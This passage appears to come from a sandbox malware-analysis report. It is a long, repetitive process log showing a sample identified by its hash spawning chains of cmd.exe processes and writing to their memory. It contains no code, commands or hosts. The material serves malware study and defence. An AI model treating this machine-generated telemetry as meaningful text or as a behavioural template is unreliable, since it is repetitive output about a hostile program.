cmd.exe 636 PID 1332 wrote to memory of 1216 1332 cmd.exe 636 PID 1332 wrote to memory of 1216 1332 cmd.exe 636 PID 1332 wrote to memory of 228 1332 cmd.exe 637 PID 1332 wrote to memory of 228 1332 cmd.exe 637 PID 1332 wrote to memory of 228 1332 cmd.exe 637 PID 1332 wrote to memory of 228 1332 cmd.exe 637 PID 228 wrote to memory of 1796 228 cmd.exe 638 PID 228 wrote to memory of 1796 228 cmd.exe 638 PID 228 wrote to memory of 1796 228 cmd.exe 638 PID 228 wrote to memory of 1796 228 cmd.exe 638 PID 1332 wrote to memory of 1584 1332 cmd.exe 639 PID 1332 wrote to memory of 1584 1332 cmd.exe 639 PID 1332 wrote to memory of 1584 1332 cmd.exe 639 PID 1332 wrote to memory of 1584 1332 cmd.exe 639 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 640 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 640 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 640 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 640 PID 1776 wrote to memory of 1824 1776 cmd.exe 642 PID 1776 wrote to memory of 1824 1776 cmd.exe 642 PID 1776 wrote to memory of 1824 1776 cmd.exe 642 PID 1776 wrote to memory of 1824 1776 cmd.exe 642 PID 1776 wrote to memory of 1152 1776 cmd.exe 643 PID 1776 wrote to memory of 1152 1776 cmd.exe 643 PID 1776 wrote to memory of 1152 1776 cmd.exe 643 PID 1776 wrote to memory of 1152 1776 cmd.exe 643 PID 1776 wrote to memory of 1176 1776 cmd.exe 644 PID 1776 wrote to memory of 1176 1776 cmd.exe 644 PID 1776 wrote to memory of 1176 1776 cmd.exe 644 PID 1776 wrote to memory of 1176 1776 cmd.exe 644 PID 1176 wrote to memory of 1212 1176 cmd.exe 645 PID 1176 wrote to memory of 1212 1176 cmd.exe 645 PID 1176 wrote to memory of 1212 1176 cmd.exe 645 PID 1176 wrote to memory of 1212 1176 cmd.exe 645 PID 1776 wrote to memory of 2036 1776 cmd.exe 646 PID 1776 wrote to memory of 2036 1776 cmd.exe 646 PID 1776 wrote to memory of 2036 1776 cmd.exe 646 PID 1776 wrote to memory of 2036 1776 cmd.exe 646 PID 616 wrote to memory of 1516 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 647 PID 616 wrote to memory of 1516 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 647 PID 616 wrote to memory of 1516 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 647 PID 616 wrote to memory of 1516 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 647 PID 1516 wrote to memory of 1120 1516 cmd.exe 649 PID 1516 wrote to memory of 1120 1516 cmd.exe 649 PID 1516 wrote to memory of 1120 1516 cmd.exe 649 PID 1516 wrote to memory of 1120 1516 cmd.exe 649 PID 1516 wrote to memory of 1832 1516 cmd.exe 650 PID 1516 wrote to memory of 1832 1516 cmd.exe 650 PID 1516 wrote to memory of 1832 1516 cmd.exe 650 PID 1516 wrote to memory of 1832 1516 cmd.exe 650 PID 1516 wrote to memory of 1468 1516 cmd.exe 651 PID 1516 wrote to memory of 1468 1516 cmd.exe 651 PID 1516 wrote to memory of 1468 1516 cmd.exe 651 PID 1516 wrote to memory of 1468 1516 cmd.exe 651 PID 1468 wrote to memory of 1868 1468 cmd.exe 652 PID 1468 wrote to memory of 1868 1468 cmd.exe 652 PID 1468 wrote to memory of 1868 1468 cmd.exe 652 PID 1468 wrote to memory of 1868 1468 cmd.exe 652 PID 1516 wrote to memory of 976 1516 cmd.exe 653 PID 1516 wrote to memory of 976 1516 cmd.exe 653 PID 1516 wrote to memory of 976 1516 cmd.exe 653 PID 1516 wrote to memory of 976 1516 cmd.exe 653 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 654 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 654 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 654 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 654 PID 360 wrote to memory of 972 360 cmd.exe 656 PID 360 wrote to memory of 972 360 cmd.exe 656 PID 360 wrote to memory of 972 360 cmd.exe 656 PID 360 wrote to memory of 972 360 cmd.exe 656 PID 360 wrote to memory of 1796 360 cmd.exe 657 PID 360 wrote to memory of 1796 360 cmd.exe 657 PID 360 wrote to memory of 1796 360 cmd.exe 657 PID 360 wrote to memory of 1796 360 cmd.exe 657 PID 360 wrote to memory of 1432 360 cmd.exe 658 PID 360 wrote to memory of 1432 360 cmd.exe 658 PID 360 wrote to memory of 1432 360 cmd.exe 658 PID 360 wrote to memory of 1432 360 cmd.exe 658 PID 1432 wrote to memory of 1168 1432 cmd.exe 659 PID 1432 wrote to memory of 1168 1432 cmd.exe 659 PID 1432 wrote to memory of 1168 1432 cmd.exe 659 PID 1432 wrote to memory of 1168 1432 cmd.exe 659 PID 360 wrote to memory of 548 360 cmd.exe 660 PID 360 wrote to memory of 548 360 cmd.exe 660 PID 360 wrote to memory of 548 360 cmd.exe 660 PID 360 wrote to memory of 548 360 cmd.exe 660 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 661 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 661 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 661 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 661 PID 624 wrote to memory of 1680 624 cmd.exe 663 PID 624 wrote to memory of 1680 624 cmd.exe 663 PID 624 wrote to memory of 1680 624 cmd.exe 663 PID 624 wrote to memory of 1680 624 cmd.exe 663 PID 624 wrote to memory of 1212 624 cmd.exe 664 PID 624 wrote to memory of 1212 624 cmd.exe 664 PID 624 wrote to memory of 1212 624 cmd.exe 664 PID 624 wrote to memory of 1212 624 cmd.exe 664 PID 624 wrote to memory of 1020 624 cmd.exe 665 PID 624 wrote to memory of 1020 624 cmd.exe 665 PID 624 wrote to memory of 1020 624 cmd.exe 665 PID 624 wrote to memory of 1020 624 cmd.exe 665 PID 1020 wrote to memory of 1960 1020 cmd.exe 666 PID 1020 wrote to memory of 1960 1020 cmd.exe 666 PID 1020 wrote to memory of 1960 1020 cmd.exe 666 PID 1020 wrote to memory of 1960 1020 cmd.exe 666 PID 624 wrote to memory of 964 624 cmd.exe 667 PID 624 wrote to memory of 964 624 cmd.exe 667 PID 624 wrote to memory of 964 624 cmd.exe 667 PID 624 wrote to memory of 964 624 cmd.exe 667 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 668 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 668 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 668 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 668 PID 1492 wrote to memory of 1256 1492 cmd.exe 670 PID 1492 wrote to memory of 1256 1492 cmd.exe 670 PID 1492 wrote to memory of 1256 1492 cmd.exe 670 PID 1492 wrote to memory of 1256 1492 cmd.exe 670 PID 1492 wrote to memory of 1868 1492 cmd.exe 671 PID 1492 wrote to memory of 1868 1492 cmd.exe 671 PID 1492 wrote to memory of 1868 1492 cmd.exe 671 PID 1492 wrote to memory of 1868 1492 cmd.exe 671 PID 1492 wrote to memory of 948 1492 cmd.exe 672 PID 1492 wrote to memory of 948 1492 cmd.exe 672 PID 1492 wrote to memory of 948 1492 cmd.exe 672 PID 1492 wrote to memory of 948 1492 cmd.exe 672 PID 948 wrote to memory of 908 948 cmd.exe 673 PID 948 wrote to memory of 908 948 cmd.exe 673 PID 948 wrote to memory of 908 948 cmd.exe 673 PID 948 wrote to memory of 908 948 cmd.exe 673 PID 1492 wrote to memory of 920 1492 cmd.exe 674 PID 1492 wrote to memory of 920 1492 cmd.exe 674 PID 1492 wrote to memory of 920 1492 cmd.exe 674 PID 1492 wrote to memory of 920 1492 cmd.exe 674 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 675 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 675 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 675 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 675 PID 1948 wrote to memory of 1936 1948 cmd.exe 677 PID 1948 wrote to memory of 1936 1948 cmd.exe 677 PID 1948 wrote to memory of 1936 1948 cmd.exe 677 PID 1948 wrote to memory of 1936 1948 cmd.exe 677 PID 1948 wrote to memory of 1168 1948 cmd.exe 678 PID 1948 wrote to memory of 1168 1948 cmd.exe 678 PID 1948 wrote to memory of 1168 1948 cmd.exe 678 PID 1948 wrote to memory of 1168 1948 cmd.exe 678 PID 1948 wrote to memory of 1060 1948 cmd.exe 679 PID 1948 wrote to memory of 1060 1948 cmd.exe 679 PID 1948 wrote to memory of 1060 1948 cmd.exe 679 PID 1948 wrote to memory of 1060 1948 cmd.exe 679 PID 1060 wrote to memory of 1808 1060 cmd.exe 680 PID 1060 wrote to memory of 1808 1060 cmd.exe 680 PID 1060 wrote to memory of 1808 1060 cmd.exe 680 PID 1060 wrote to memory of 1808 1060 cmd.exe 680 PID 1948 wrote to memory of 1756 1948 cmd.exe 681 PID 1948 wrote to memory of 1756 1948 cmd.exe 681 PID 1948 wrote to memory of 1756 1948 cmd.exe 681 PID 1948 wrote to memory of 1756 1948 cmd.exe 681 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 682 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 682 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 682 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 682 PID 1556 wrote to memory of 1472 1556 cmd.exe 684 PID 1556 wrote to memory of 1472 1556 cmd.exe 684 PID 1556 wrote to memory of 1472 1556 cmd.exe 684 PID 1556 wrote to memory of 1472 1556 cmd.exe 684 PID 1556 wrote to memory of 1960 1556 cmd.exe 685 PID 1556 wrote to memory of 1960 1556 cmd.exe 685 PID 1556 wrote to memory of 1960 1556 cmd.exe 685 PID 1556 wrote to memory of 1960 1556 cmd.exe 685 PID 1556 wrote to memory of 1076 1556 cmd.exe 686 PID 1556 wrote to memory of 1076 1556 cmd.exe 686 PID 1556 wrote to memory of 1076 1556 cmd.exe 686 PID 1556 wrote to memory of 1076 1556 cmd.exe 686 PID 1076 wrote to memory of 1980 1076 cmd.exe 687 PID 1076 wrote to memory of 1980 1076 cmd.exe 687 PID 1076 wrote to memory of 1980 1076 cmd.exe 687 PID 1076 wrote to memory of 1980 1076 cmd.exe 687 PID 1556 wrote to memory of 1152 1556 cmd.exe 688 PID 1556 wrote to memory of 1152 1556 cmd.exe 688 PID 1556 wrote to memory of 1152 1556 cmd.exe 688 PID 1556 wrote to memory of 1152 1556 cmd.exe 688 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 689 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 689 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 689 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 689 PID 1828 wrote to memory of 1944 1828 cmd.exe 691 PID 1828 wrote to memory of 1944 1828 cmd.exe 691 PID 1828 wrote to memory of 1944 1828 cmd.exe 691 PID 1828 wrote to memory of 1944 1828 cmd.exe 691 PID 1828 wrote to memory of 908 1828 cmd.exe 692 PID 1828 wrote to memory of 908 1828 cmd.exe 692 PID 1828 wrote to memory of 908 1828 cmd.exe 692 PID 1828 wrote to memory of 908 1828 cmd.exe 692 PID 1828 wrote to memory of 1088 1828 cmd.exe 693 PID 1828 wrote to memory of 1088 1828 cmd.exe 693 PID 1828 wrote to memory of 1088 1828 cmd.exe 693 PID 1828 wrote to memory of 1088 1828 cmd.exe 693 PID 1088 wrote to memory of 920 1088 cmd.exe 694 PID 1088 wrote to memory of 920 1088 cmd.exe 694 PID 1088 wrote to memory of 920 1088 cmd.exe 694 PID 1088 wrote to memory of 920 1088 cmd.exe 694 PID 1828 wrote to memory of 1832 1828 cmd.exe 695 PID 1828 wrote to memory of 1832 1828 cmd.exe 695 PID 1828 wrote to memory of 1832 1828 cmd.exe 695 PID 1828 wrote to memory of 1832 1828 cmd.exe 695 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 696 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 696 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 696 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 696 PID 1584 wrote to memory of 1216 1584 cmd.exe 698 PID 1584 wrote to memory of 1216 1584 cmd.exe 698 PID 1584 wrote to memory of 1216 1584 cmd.exe 698 PID 1584 wrote to memory of 1216 1584 cmd.exe 698 PID 1584 wrote to memory of 1808 1584 cmd.exe 699 PID 1584 wrote to memory of 1808 1584 cmd.exe 699 PID 1584 wrote to memory of 1808 1584 cmd.exe 699 PID 1584 wrote to memory of 1808 1584 cmd.exe 699 PID 1584 wrote to memory of 1824 1584 cmd.exe 700 PID 1584 wrote to memory of 1824 1584 cmd.exe 700 PID 1584 wrote to memory of 1824 1584 cmd.exe 700 PID 1584 wrote to memory of 1824 1584 cmd.exe 700 PID 1824 wrote to memory of 472 1824 cmd.exe 701 PID 1824 wrote to memory of 472 1824 cmd.exe 701 PID 1824 wrote to memory of 472 1824 cmd.exe 701 PID 1824 wrote to memory of 472 1824 cmd.exe 701 PID 1584 wrote to memory of 1796 1584 cmd.exe 702 PID 1584 wrote to memory of 1796 1584 cmd.exe 702 PID 1584 wrote to memory of 1796 1584 cmd.exe 702 PID 1584 wrote to memory of 1796 1584 cmd.exe 702 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 703 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 703 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 703 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 703 PID 1684 wrote to memory of 368 1684 cmd.exe 705 PID 1684 wrote to memory of 368 1684 cmd.exe 705 PID 1684 wrote to memory of 368 1684 cmd.exe 705 PID 1684 wrote to memory of 368 1684 cmd.exe 705 PID 1684 wrote to memory of 2032 1684 cmd.exe 706 PID 1684 wrote to memory of 2032 1684 cmd.exe 706 PID 1684 wrote to memory of 2032 1684 cmd.exe 706 PID 1684 wrote to memory of 2032 1684 cmd.exe 706 PID 1684 wrote to memory of 1120 1684 cmd.exe 707 PID 1684 wrote to memory of 1120 1684 cmd.exe 707 PID 1684 wrote to memory of 1120 1684 cmd.exe 707 PID 1684 wrote to memory of 1120 1684 cmd.exe 707 PID 1120 wrote to memory of 1152 1120 cmd.exe 708 PID 1120 wrote to memory of 1152 1120 cmd.exe 708 PID 1120 wrote to memory of 1152 1120 cmd.exe 708 PID 1120 wrote to memory of 1152 1120 cmd.exe 708 PID 1684 wrote to memory of 1176 1684 cmd.exe 709 PID 1684 wrote to memory of 1176 1684 cmd.exe 709 PID 1684 wrote to memory of 1176 1684 cmd.exe 709 PID 1684 wrote to memory of 1176 1684 cmd.exe 709 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 710 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 710 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 710 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 710 PID 976 wrote to memory of 680 976 cmd.exe 712 PID 976 wrote to memory of 680 976 cmd.exe 712 PID 976 wrote to memory of 680 976 cmd.exe 712 PID 976 wrote to memory of 680 976 cmd.exe 712 PID 976 wrote to memory of 920 976 cmd.exe 713 PID 976 wrote to memory of 920 976 cmd.exe 713 PID 976 wrote to memory of 920 976 cmd.exe 713 PID 976 wrote to memory of 920 976 cmd.exe 713 PID 976 wrote to memory of 1996 976 cmd.exe 714 PID 976 wrote to memory of 1996 976 cmd.exe 714 PID 976 wrote to memory of 1996 976 cmd.exe 714 PID 976 wrote to memory of 1996 976 cmd.exe 714 PID 1996 wrote to memory of 1832 1996 cmd.exe 715 PID 1996 wrote to memory of 1832 1996 cmd.exe 715 PID 1996 wrote to memory of 1832 1996 cmd.exe 715 PID 1996 wrote to memory of 1832 1996 cmd.exe 715 PID 976 wrote to memory of 1468 976 cmd.exe 716 PID 976 wrote to memory of 1468 976 cmd.exe 716 PID 976 wrote to memory of 1468 976 cmd.exe 716 PID 976 wrote to memory of 1468 976 cmd.exe 716 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 717 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 717 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 717 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 717 PID 1956 wrote to memory of 1340 1956 cmd.exe 719 PID 1956 wrote to memory of 1340 1956 cmd.exe 719 PID 1956 wrote to memory of 1340 1956 cmd.exe 719 PID 1956 wrote to memory of 1340 1956 cmd.exe 719 PID 1956 wrote to memory of 224 1956 cmd.exe 720 PID 1956 wrote to memory of 224 1956 cmd.exe 720 PID 1956 wrote to memory of 224 1956 cmd.exe 720 PID 1956 wrote to memory of 224 1956 cmd.exe 720 PID 1956 wrote to memory of 228 1956 cmd.exe 721 PID 1956 wrote to memory of 228 1956 cmd.exe 721 PID 1956 wrote to memory of 228 1956 cmd.exe 721 PID 1956 wrote to memory of 228 1956 cmd.exe 721 PID 228 wrote to memory of 1168 228 cmd.exe 722 PID 228 wrote to memory of 1168 228 cmd.exe 722 PID 228 wrote to memory of 1168 228 cmd.exe 722 PID 228 wrote to memory of 1168 228 cmd.exe 722 PID 1956 wrote to memory of 1472 1956 cmd.exe 723 PID 1956 wrote to memory of 1472 1956 cmd.exe 723 PID 1956 wrote to memory of 1472 1956 cmd.exe 723 PID 1956 wrote to memory of 1472 1956 cmd.exe 723 PID 616 wrote to memory of 368 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 724 PID 616 wrote to memory of 368 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 724 PID 616 wrote to memory of 368 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 724 PID 616 wrote to memory of 368 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 724 PID 368 wrote to memory of 1212 368 cmd.exe 726 PID 368 wrote to memory of 1212 368 cmd.exe 726 PID 368 wrote to memory of 1212 368 cmd.exe 726 PID 368 wrote to memory of 1212 368 cmd.exe 726 PID 368 wrote to memory of 1120 368 cmd.exe 727 PID 368 wrote to memory of 1120 368 cmd.exe 727 PID 368 wrote to memory of 1120 368 cmd.exe 727 PID 368 wrote to memory of 1120 368 cmd.exe 727 PID 368 wrote to memory of 952 368 cmd.exe 728 PID 368 wrote to memory of 952 368 cmd.exe 728 PID 368 wrote to memory of 952 368 cmd.exe 728 PID 368 wrote to memory of 952 368 cmd.exe 728 PID 952 wrote to memory of 2036 952 cmd.exe 729 PID 952 wrote to memory of 2036 952 cmd.exe 729 PID 952 wrote to memory of 2036 952 cmd.exe 729 PID 952 wrote to memory of 2036 952 cmd.exe 729 PID 368 wrote to memory of 1964 368 cmd.exe 730 PID 368 wrote to memory of 1964 368 cmd.exe 730 PID 368 wrote to memory of 1964 368 cmd.exe 730 PID 368 wrote to memory of 1964 368 cmd.exe 730 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 731 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 731 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 731 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 731 PID 1088 wrote to memory of 1868 1088 cmd.exe 733 PID 1088 wrote to memory of 1868 1088 cmd.exe 733 PID 1088 wrote to memory of 1868 1088 cmd.exe 733 PID 1088 wrote to memory of 1868 1088 cmd.exe 733 PID 1088 wrote to memory of 1996 1088 cmd.exe 734 PID 1088 wrote to memory of 1996 1088 cmd.exe 734 PID 1088 wrote to memory of 1996 1088 cmd.exe 734 PID 1088 wrote to memory of 1996 1088 cmd.exe 734 PID 1088 wrote to memory of 1936 1088 cmd.exe 735 PID 1088 wrote to memory of 1936 1088 cmd.exe 735 PID 1088 wrote to memory of 1936 1088 cmd.exe 735 PID 1088 wrote to memory of 1936 1088 cmd.exe 735 PID 1936 wrote to memory of 1188 1936 cmd.exe 736 PID 1936 wrote to memory of 1188 1936 cmd.exe 736 PID 1936 wrote to memory of 1188 1936 cmd.exe 736 PID 1936 wrote to memory of 1188 1936 cmd.exe 736 PID 1088 wrote to memory of 1808 1088 cmd.exe 737 PID 1088 wrote to memory of 1808 1088 cmd.exe 737 PID 1088 wrote to memory of 1808 1088 cmd.exe 737 PID 1088 wrote to memory of 1808 1088 cmd.exe 737 PID 616 wrote to memory of 1680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 738 PID 616 wrote to memory of 1680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 738 PID 616 wrote to memory of 1680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 738 PID 616 wrote to memory of 1680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 738 PID 1680 wrote to memory of 1432 1680 cmd.exe 740 PID 1680 wrote to memory of 1432 1680 cmd.exe 740 PID 1680 wrote to memory of 1432 1680 cmd.exe 740 PID 1680 wrote to memory of 1432 1680 cmd.exe 740 PID 1680 wrote to memory of 228 1680 cmd.exe 741 PID 1680 wrote to memory of 228 1680 cmd.exe 741 PID 1680 wrote to memory of 228 1680 cmd.exe 741 PID 1680 wrote to memory of 228 1680 cmd.exe 741 PID 1680 wrote to memory of 232 1680 cmd.exe 742 PID 1680 wrote to memory of 232 1680 cmd.exe 742 PID 1680 wrote to memory of 232 1680 cmd.exe 742 PID 1680 wrote to memory of 232 1680 cmd.exe 742 PID 232 wrote to memory of 1216 232 cmd.exe 743 PID 232 wrote to memory of 1216 232 cmd.exe 743 PID 232 wrote to memory of 1216 232 cmd.exe 743 PID 232 wrote to memory of 1216 232 cmd.exe 743 PID 1680 wrote to memory of 1232 1680 cmd.exe 744 PID 1680 wrote to memory of 1232 1680 cmd.exe 744 PID 1680 wrote to memory of 1232 1680 cmd.exe 744 PID 1680 wrote to memory of 1232 1680 cmd.exe 744 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 745 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 745 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 745 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 745 PID 1488 wrote to memory of 1944 1488 cmd.exe 747 PID 1488 wrote to memory of 1944 1488 cmd.exe 747 PID 1488 wrote to memory of 1944 1488 cmd.exe 747 PID 1488 wrote to memory of 1944 1488 cmd.exe 747 PID 1488 wrote to memory of 952 1488 cmd.exe 748 PID 1488 wrote to memory of 952 1488 cmd.exe 748 PID 1488 wrote to memory of 952 1488 cmd.exe 748 PID 1488 wrote to memory of 952 1488 cmd.exe 748 PID 1488 wrote to memory of 680 1488 cmd.exe 749 PID 1488 wrote to memory of 680 1488 cmd.exe 749 PID 1488 wrote to memory of 680 1488 cmd.exe 749 PID 1488 wrote to memory of 680 1488 cmd.exe 749 PID 680 wrote to memory of 436 680 cmd.exe 750 PID 680 wrote to memory of 436 680 cmd.exe 750 PID 680 wrote to memory of 436 680 cmd.exe 750 PID 680 wrote to memory of 436 680 cmd.exe 750 PID 1488 wrote to memory of 688 1488 cmd.exe 751 PID 1488 wrote to memory of 688 1488 cmd.exe 751 PID 1488 wrote to memory of 688 1488 cmd.exe 751 PID 1488 wrote to memory of 688 1488 cmd.exe 751 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 752 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 752 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 752 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 752 PID 1868 wrote to memory of 1060 1868 cmd.exe 754 PID 1868 wrote to memory of 1060 1868 cmd.exe 754 PID 1868 wrote to memory of 1060 1868 cmd.exe 754 PID 1868 wrote to memory of 1060 1868 cmd.exe 754 PID 1868 wrote to memory of 1468 1868 cmd.exe 755 PID 1868 wrote to memory of 1468 1868 cmd.exe 755 PID 1868 wrote to memory of 1468 1868 cmd.exe 755 PID 1868 wrote to memory of 1468 1868 cmd.exe 755 PID 1868 wrote to memory of 472 1868 cmd.exe 756 PID 1868 wrote to memory of 472 1868 cmd.exe 756 PID 1868 wrote to memory of 472 1868 cmd.exe 756 PID 1868 wrote to memory of 472 1868 cmd.exe 756 PID 472 wrote to memory of 1808 472 cmd.exe 757 PID 472 wrote to memory of 1808 472 cmd.exe 757 PID 472 wrote to memory of 1808 472 cmd.exe 757 PID 472 wrote to memory of 1808 472 cmd.exe 757 PID 1868 wrote to memory of 920 1868 cmd.exe 758 PID 1868 wrote to memory of 920 1868 cmd.exe 758 PID 1868 wrote to memory of 920 1868 cmd.exe 758 PID 1868 wrote to memory of 920 1868 cmd.exe 758 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 759 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 759 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 759 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 759 PID 1796 wrote to memory of 564 1796 cmd.exe 761 PID 1796 wrote to memory of 564 1796 cmd.exe 761 